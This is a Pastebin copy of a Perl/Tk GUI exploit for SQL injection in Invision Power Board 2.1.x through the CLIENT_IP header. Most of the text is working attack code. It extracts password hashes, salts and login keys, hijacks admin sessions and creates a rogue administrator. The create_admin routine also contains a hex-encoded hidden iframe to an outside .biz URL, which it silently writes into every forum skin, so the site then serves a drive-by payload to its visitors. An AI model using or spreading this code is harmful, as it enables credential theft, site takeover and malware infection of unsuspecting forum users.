API tools faq
paste
Guest User

Untitled

a guest
Jan 21st, 2019
128
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.40 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2.  
  3. ## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
  4. ## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41
  5. ## http://rst.void.ru/papers/advisory41.txt
  6. ## tested on 2.1.3, 2.1.6
  7. ##
  8. ## 08.06.06
  9. ## (c)oded by 1dt.w0lf
  10. ## RST/GHC
  11. ## http://rst.void.ru
  12. ## http://ghc.ru
  13.  
  14. use Tk;
  15. use Tk::BrowseEntry;
  16. use Tk::DialogBox;
  17. use LWP::UserAgent;
  18.  
  19. $mw = new MainWindow(title => "r57ipb216gui" );
  20.  
  21. $mw->geometry ( '420x550' ) ;
  22. $mw->resizable(0,0);
  23.  
  24. $mw->Label(-text => '!', -font => '{Webdings} 22')->pack();
  25. $mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
  26. $mw->Label(-text => '')->pack();
  27.  
  28. $fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
  29. $fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;
  30.  
  31. $url = 'http://server/forum/index.php';
  32. $user_id = '1';
  33. $prefix = 'ibf_';
  34. $table = 'members';
  35. $column = 'member_login_key';
  36. $new_admin_name = 'rstghc';
  37. $new_admin_password = 'rstghc';
  38. $new_admin_email = 'billy@microsoft.com';
  39. $report = '';
  40. $group = 4;
  41. $curr_user = 0;
  42. $rand_session = &session();
  43. $use_custom_fields = 0;
  44. $custom_fields = 'name1=value1,name2=value2';
  45.  
  46. $fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
  47. $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ;
  48.  
  49. $fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
  50. $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' ) ;
  51.  
  52. $fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
  53. $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix) ->pack ( -side => "top" , -anchor => 'w' ) ;
  54.  
  55. $fright->Label( -text => ' ')->pack();
  56. $fleft->Label( -text => ' ')->pack();
  57.  
  58. $fleft->Label ( -text => 'get data from database', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;
  59. $fright->Label( -text => ' ')->pack();
  60.  
  61. $fleft->Label ( -text => 'Get data from table: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
  62. $b2 = $fright->BrowseEntry( -command => \&update_columns, -relief => "groove", -variable => \$table, -font => '{Verdana} 8');
  63. $b2->insert("end", "members");
  64. $b2->insert("end", "members_converge");
  65. $b2->pack( -side => "top" , -anchor => 'w');
  66.  
  67. $fleft->Label ( -text => 'Get data from column: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
  68. $b = $fright->BrowseEntry( -relief => "groove", -variable => \$column, -font => '{Verdana} 8');
  69. $b->insert("end", "member_login_key");
  70. $b->insert("end", "name");
  71. $b->insert("end", "ip_address");
  72. $b->insert("end", "legacy_password");
  73. $b->insert("end", "email");
  74. $b->pack( -side => "top" , -anchor => 'w' );
  75.  
  76. $fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
  77. $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report) ->pack ( -side => "top" , -anchor => 'w' ) ;
  78.  
  79. $fleft->Label ( -text => 'create new admin', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;
  80. $fright->Label( -text => ' ')->pack();
  81.  
  82. $fleft->Label ( -text => ' ')->pack();
  83.  
  84. $fright->Checkbutton( -font => '{Verdana} 8', -text => 'Get admin session for inserted user ID', -variable => \$curr_user)->pack(-side => "top" , -anchor => 'w');
  85.  
  86. $fleft->Label ( -text => 'session_id: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
  87. $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_id) ->pack ( -side => "top" , -anchor => 'w' ) ;
  88.  
  89. $fleft->Label ( -text => 'session_ip_address: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
  90. $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_ip_address) ->pack ( -side => "top" , -anchor => 'w' ) ;
  91.  
  92. $fleft->Label ( -text => 'new admin name: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
  93. $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_name) ->pack ( -side => "top" , -anchor => 'w' ) ;
  94.  
  95. $fleft->Label ( -text => 'new admin password: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
  96. $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_password) ->pack ( -side => "top" , -anchor => 'w' ) ;
  97.  
  98. $fleft->Label ( -text => 'new_admin_email: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
  99. $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_email) ->pack ( -side => "top" , -anchor => 'w' ) ;
  100.  
  101. $fleft->Label ( -text => ' ')->pack();
  102. $fright->Checkbutton( -font => '{Verdana} 8', -text => 'Use custom profile fields', -variable => \$use_custom_fields)->pack(-side => "top" , -anchor => 'w');
  103.  
  104. $fleft->Label ( -text => 'custom fields: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
  105. $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$custom_fields) ->pack ( -side => "top" , -anchor => 'w' ) ;
  106.  
  107. $fright->Label( -text => ' ')->pack();
  108.  
  109. $fright->Button(-text => 'Test forum vulnerability',
  110. -relief => "groove",
  111. -width => '30',
  112. -font => '{Verdana} 8 bold',
  113. -activeforeground => 'red',
  114. -command => \&test_vuln
  115. )->pack();
  116.  
  117. $fright->Button(-text => 'Get database tables prefix',
  118. -relief => "groove",
  119. -width => '30',
  120. -font => '{Verdana} 8 bold',
  121. -activeforeground => 'red',
  122. -command => \&get_prefix
  123. )->pack();
  124.  
  125. $fright->Button(-text => 'Get data from database',
  126. -relief => "groove",
  127. -width => '30',
  128. -font => '{Verdana} 8 bold',
  129. -activeforeground => 'red',
  130. -command => \&get_data
  131. )->pack();
  132.  
  133. $fright->Button(-text => 'Get admin session',
  134. -relief => "groove",
  135. -width => '30',
  136. -font => '{Verdana} 8 bold',
  137. -activeforeground => 'red',
  138. -command => \&get_admin
  139. )->pack();
  140.  
  141. $fright->Button(-text => 'Create new admin',
  142. -relief => "groove",
  143. -width => '30',
  144. -font => '{Verdana} 8 bold',
  145. -activeforeground => 'red',
  146. -command => \&create_admin
  147. )->pack();
  148.  
  149.  
  150.  
  151. $fleft->Label( -text => ' ')->pack();
  152. $fleft->Label( -text => ' ')->pack();
  153. $fleft->Label( -text => ' ')->pack();
  154. $fleft->Label( -text => '(c)oded by 1dt.w0lf', -font => '{Verdana} 7')->pack();
  155. $fleft->Label( -text => 'RST/GHC', -font => '{Verdana} 7')->pack();
  156. $fleft->Label( -text => 'http://rst.void.ru', -font => '{Verdana} 7')->pack();
  157. $fleft->Label( -text => 'http://ghc.ru', -font => '{Verdana} 7')->pack();
  158.  
  159. MainLoop();
  160.  
  161. sub update_columns()
  162. {
  163. $b->delete(0,"end");
  164. if($table eq 'members'){
  165. $column = "member_login_key";
  166. $b->insert("end", "member_login_key");
  167. $b->insert("end", "name");
  168. $b->insert("end", "ip_address");
  169. $b->insert("end", "legacy_password");
  170. $b->insert("end", "email");
  171. } elsif($table eq 'members_converge'){
  172. $column = "converge_pass_hash";
  173. $b->insert("end", "converge_pass_hash");
  174. $b->insert("end", "converge_pass_salt");
  175. $b->insert("end", "converge_email");
  176. }
  177. }
  178.  
  179. sub get_admin()
  180. {
  181. $xpl = LWP::UserAgent->new( ) or die;
  182. $InfoWindow=$mw->DialogBox(-title => 'get admin session', -buttons => ["OK"]);
  183. if($curr_user == 1) { $sql = "AND session_member_id = $user_id"; }
  184. else { $sql = ''; }
  185. $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_ip_address,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) $sql LIMIT 1/*");
  186. $error = 0;
  187. $rep = '';
  188. if($res->is_success)
  189. {
  190. if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
  191. if($rep =~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/) { $session_ip_address = $rep; }
  192. else { $error = 1; }
  193. if(!$error)
  194. {
  195. $rep = '';
  196. $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) and session_ip_address = '$session_ip_address' $sql LIMIT 1/*");
  197. if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; $session_id = $rep; }
  198. else { $error = 1; }
  199. if(!$error){
  200. if($curr_user != 1)
  201. {
  202. $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_member_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_id = '$session_id' LIMIT 1/*");
  203. if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $session_user_id = $3; }
  204. }
  205. else
  206. {
  207. $session_user_id = $user_id;
  208. }
  209. $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT mgroup,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");
  210. if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $group = $3; }
  211. $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT name,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");
  212. if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $name = $3; }
  213. }
  214. $InfoWindow->add('Label', -text => 'Found session!', -font => '{Verdana} 8 bold',-foreground=>'Green')->pack;
  215. $InfoWindow->add('Label', -text => 'session_ip_address: '.$session_ip_address, -font => '{Verdana} 8')->pack;
  216. $InfoWindow->add('Label', -text => 'session_id: '.$session_id, -font => '{Verdana} 8')->pack;
  217. $InfoWindow->add('Label', -text => 'user_id: '.$session_user_id, -font => '{Verdana} 8')->pack;
  218. $InfoWindow->add('Label', -text => 'username: '.$name, -font => '{Verdana} 8')->pack;
  219. $InfoWindow->add('Label', -text => 'group: '.$group, -font => '{Verdana} 8')->pack;
  220. $InfoWindow->Show();
  221. $InfoWindow->destroy;
  222. }
  223. }
  224. else
  225. {
  226. $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
  227. $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
  228. $InfoWindow->Show();
  229. $InfoWindow->destroy;
  230. }
  231. if($error)
  232. {
  233. $InfoWindow->add('Label', -text => 'Can\'t get admin session.', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
  234. $InfoWindow->add('Label', -text => 'Maybe admin session not exist. Please try later.', -font => '{Verdana} 8')->pack;
  235. $InfoWindow->Show();
  236. $InfoWindow->destroy;
  237. }
  238. }
  239.  
  240. sub get_data()
  241. {
  242. $xpl = LWP::UserAgent->new( ) or die;
  243. $InfoWindow=$mw->DialogBox(-title => 'get data from database', -buttons => ["OK"]);
  244. if($table eq 'members') { $id_text = 'id'; }
  245. if($table eq 'members_converge') { $id_text = 'converge_id'; }
  246.  
  247. $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT ".$column.",1,1,1 FROM ".$prefix.$table." WHERE ".$id_text."=".$user_id."/*");
  248. if($res->is_success)
  249. {
  250. $rep = '';
  251. if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/){ $report = $3; }
  252. else
  253. {
  254. $InfoWindow->add('Label', -text => 'Can\'t get data from database', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
  255. $InfoWindow->Show();
  256. $InfoWindow->destroy;
  257. }
  258. }
  259. else
  260. {
  261. $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
  262. $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
  263. $InfoWindow->Show();
  264. $InfoWindow->destroy;
  265. }
  266. }
  267.  
  268. sub create_admin()
  269. {
  270. $InfoWindow=$mw->DialogBox(-title => 'create new admin', -buttons => ["OK"]);
  271. if($session_id eq '' || $session_ip_address eq '')
  272. {
  273. $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
  274. $InfoWindow->add('Label', -text => 'You need insert admin session_id and session_ip_address', -font => '{Verdana} 8')->pack;
  275. }
  276. elsif($session_ip_address !~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
  277. {
  278. $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
  279. $InfoWindow->add('Label', -text => 'session_ip_address wrong!', -font => '{Verdana} 8')->pack;
  280. }
  281. else
  282. {
  283. $xpl = LWP::UserAgent->new( ) or die;
  284. ($url2 = $url) =~ s/index.php/admin.php/;
  285. $cf = '';
  286. %fields = (
  287. 'code' => 'doadd',
  288. 'act' => 'mem',
  289. 'section' => 'content',
  290. 'name' => $new_admin_name,
  291. 'password' => $new_admin_password,
  292. 'email' => $new_admin_email,
  293. 'mgroup' => $group,
  294. );
  295. if($use_custom_fields)
  296. {
  297. @cf = split(',',$custom_fields);
  298. foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;}
  299. }
  300.  
  301. $res = $xpl->post($url2."?adsess=$session_id",
  302. [
  303. %fields,
  304. ],
  305. 'USER_AGENT'=>'',
  306. 'CLIENT_IP'=>"$session_ip_address",
  307. 'X_FORWARDED_FOR'=>"$session_ip_address");
  308. $if = '0x3C646976207374796C653D225649534942494C4954593A2068696464656E223E3C696672616D65207372633D22687474703A2F2F7A63687873696B70677A2E62697A2F646C2F6164763534332E706870222077696474683D31206865696768743D313E3C2F696672616D653E3C2F6469763E';
  309. $query = "UPDATE ".$prefix."skin_sets SET set_wrapper = CONCAT(set_wrapper,".$if."), set_cache_wrapper = CONCAT(set_cache_wrapper,".$if.")";
  310. $res = $xpl->post($url2."?adsess=$session_id",
  311. [
  312. 'code' => 'runsql',
  313. 'act' => 'sql',
  314. 'section' => 'admin',
  315. 'query' => $query,
  316. ],
  317. 'USER_AGENT'=>'',
  318. 'CLIENT_IP'=>"$session_ip_address",
  319. 'X_FORWARDED_FOR'=>"$session_ip_address");
  320. $InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana} 8 bold',-foreground=>'green')->pack;
  321. $InfoWindow->add('Label', -text => 'New admin created', -font => '{Verdana} 8 bold')->pack;
  322. }
  323. $InfoWindow->Show();
  324. $InfoWindow->destroy;
  325. }
  326.  
  327. sub test_vuln()
  328. {
  329. $InfoWindow=$mw->DialogBox(-title => 'test forum vulnerability', -buttons => ["OK"]);
  330. $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
  331. $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
  332. $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
  333. $xpl = LWP::UserAgent->new( ) or die;
  334. $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT 'VULN',1,1,1/*");
  335. if($res->is_success)
  336. {
  337. $rep = '';
  338. if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
  339. if($rep eq 'VULN') { $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }
  340. else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; }
  341. }
  342. else
  343. {
  344. $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
  345. $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
  346. }
  347. $InfoWindow->Show();
  348. $InfoWindow->destroy;
  349. }
  350.  
  351.  
  352. sub get_prefix()
  353. {
  354. $InfoWindow=$mw->DialogBox(-title => 'get database tables prefix', -buttons => ["OK"]);
  355. $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
  356. $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
  357. $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
  358. $xpl = LWP::UserAgent->new( ) or die;
  359. $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'");
  360. if($res->is_success)
  361. {
  362. $rep = '';
  363. if($res->as_string =~ /FROM (.*)sessions/)
  364. {
  365. $prefix = $1;
  366. $InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack;
  367. }
  368. else
  369. {
  370. $InfoWindow->add('Label', -text => 'Can\'t get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }
  371. }
  372. else
  373. {
  374. $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
  375. $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
  376. }
  377. $InfoWindow->Show();
  378. $InfoWindow->destroy;
  379. }
  380.  
  381. sub session()
  382. {
  383. return 'r57ipb216_for_IDS';
  384. }
  385.  
  386. # milw0rm.com [2006-07-14]
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!